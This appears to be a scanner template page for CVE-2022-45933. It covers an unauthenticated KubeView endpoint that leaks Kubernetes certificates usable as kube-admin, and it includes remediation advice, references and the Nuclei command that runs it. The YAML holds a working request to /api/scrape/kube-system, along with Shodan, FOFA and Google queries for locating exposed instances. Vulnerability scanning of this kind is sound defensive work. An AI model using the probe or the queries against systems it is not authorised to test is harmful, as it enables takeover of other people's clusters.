KubeView <=0.1.31 - Information Disclosure
ID: CVE-2022-45933
Severity: critical
Author: For3stCo1d
Tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project
Description
Section titled “Description”KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
Section titled “YAML Source”id: CVE-2022-45933
info: name: KubeView <=0.1.31 - Information Disclosure author: For3stCo1d severity: critical description: | KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. remediation: | Upgrade KubeView to a version higher than 0.1.31 to mitigate the information disclosure vulnerability (CVE-2022-45933). reference: - https://github.com/benc-uk/kubeview/issues/95 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933 - https://nvd.nist.gov/vuln/detail/CVE-2022-45933 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-45933 cwe-id: CWE-306 epss-score: 0.01085 epss-percentile: 0.84299 cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: kubeview_project product: kubeview shodan-query: - http.title:"KubeView" - http.title:"kubeview" - http.favicon.hash:-379154636 fofa-query: - icon_hash=-379154636 - title="kubeview" google-query: intitle:"kubeview" tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project
http: - method: GET path: - "{{BaseURL}}/api/scrape/kube-system"
matchers-condition: and matchers: - type: word part: body words: - 'BEGIN CERTIFICATE' - 'END CERTIFICATE' - 'kubernetes.io' condition: and
- type: status status: - 200# digest: 4b0a00483046022100c1de5cbbb683b4a1200b2e7ccd699509c08f928828519850e3fd9d07b0ee75d4022100f4e78d35fc39e987760d421430d9768b80aec47817ca37e1b01afef5a3b95acb:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-45933.yaml"